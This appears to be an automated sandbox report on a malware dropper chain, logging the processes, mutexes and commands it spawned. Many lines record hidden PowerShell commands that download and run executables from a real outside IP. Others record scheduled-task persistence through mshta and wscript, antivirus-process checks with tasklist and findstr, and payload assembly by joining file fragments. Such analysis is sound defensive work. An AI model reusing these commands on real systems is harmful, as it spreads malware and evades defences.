Code function: 23_2_050A15D8 ChangeServiceConfigA,

23_2_050A15D8

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k6Sly2p[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1780:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6420:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4416:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8004:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2248:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:944:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2844:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6748:120:WilError_03

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: DhqvS8pXj8.exe	ReversingLabs: Detection: 59%
Source: DhqvS8pXj8.exe	Virustotal: Detection: 47%

Source: DhqvS8pXj8.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe

File read: C:\Users\user\Desktop\DhqvS8pXj8.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\DhqvS8pXj8.exe "C:\Users\user\Desktop\DhqvS8pXj8.exe"
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe "C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe "C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe"
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn mS3R9maupm1 /tr "mshta C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn mS3R9maupm1 /tr "mshta C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" any_word
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE "C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe "C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe"
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "j1HKkma32Vn" /tr "mshta \"C:\Temp\v468GkyBl.hta\"" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\v468GkyBl.hta"
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "C:\Temp\v468GkyBl.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe "C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn Z94szma4HiI /tr "mshta C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn Z94szma4HiI /tr "mshta C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process created: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe "C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe"
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe "C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE "C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE"
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js"
Source: unknown	Process created: C:\ProgramData\jhbbvnx\fbpbh.exe C:\ProgramData\jhbbvnx\fbpbh.exe
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" "
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" any_word
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe "C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe"
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Process created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe "C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe"
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Process created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe "C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe"
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe "C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe "C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" "	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe "C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe "C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe "C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process created: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe "C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn mS3R9maupm1 /tr "mshta C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta" /sc minute /mo 25 /ru "user" /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn mS3R9maupm1 /tr "mshta C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta" /sc minute /mo 25 /ru "user" /f	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE "C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" any_word
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "j1HKkma32Vn" /tr "mshta \"C:\Temp\v468GkyBl.hta\"" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\v468GkyBl.hta"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn Z94szma4HiI /tr "mshta C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn Z94szma4HiI /tr "mshta C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
